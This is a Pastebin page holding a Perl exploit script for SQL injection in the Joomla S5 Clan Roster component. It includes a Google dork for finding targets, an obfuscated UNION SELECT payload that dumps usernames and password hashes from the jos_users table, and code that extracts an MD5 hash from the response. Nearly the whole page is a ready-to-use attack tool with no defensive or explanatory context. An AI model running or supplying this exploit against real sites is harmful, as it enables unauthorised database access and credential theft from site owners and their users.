Googleinurl

Joomla S5 Clan Roster com_s5clanroster SQL Injection

Jul 6th, 2015
2,163
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/perl
  2. #Exploit title: Joomla S5 Clan Roster com_s5clanroster SQL Injection exploit
  3. #Google Dork: inurl:index.php?option=com_s5clanroster&
  4. #Vendor HomePage: http://www.joomla.org/
  5. system("clear");
  6. system("cls");
  7. print "=========================================================\n";
  8. print "* Joomla S5 Clan Roster com_s5clanroster SQL Injection  *\n";
  9. print "*               Coded by TheLooper                      *\n";
  10. print "*        Greetz: To All My Friends <3                   *\n";
  11. print "=========================================================\n";
  12. sleep 1;
  13. use LWP::UserAgent;
  14. print "Enter the target site: ";
  15. chomp(my $target=<STDIN>);
  16. $code="%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(username,0x3a,password),222+from+jos_users--%20-";
  17. $agent = LWP::UserAgent->new() or die "[!] Error while processing";
  18. $agent->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.12011');
  19. $host= $target. "/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null".$code;
  20. $ok = $agent->request(HTTP::Request->new(GET=>$host));
  21. $ok1 = $ok->content; if ($ok1 =~/([0-9a-fA-F]{32})/){
  22. print "[+] Password found --> $1\n$2\n";
  23. sleep 1;
  24. }
  25. else
  26. {
  27. print "Password not found \n";
  28. }
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×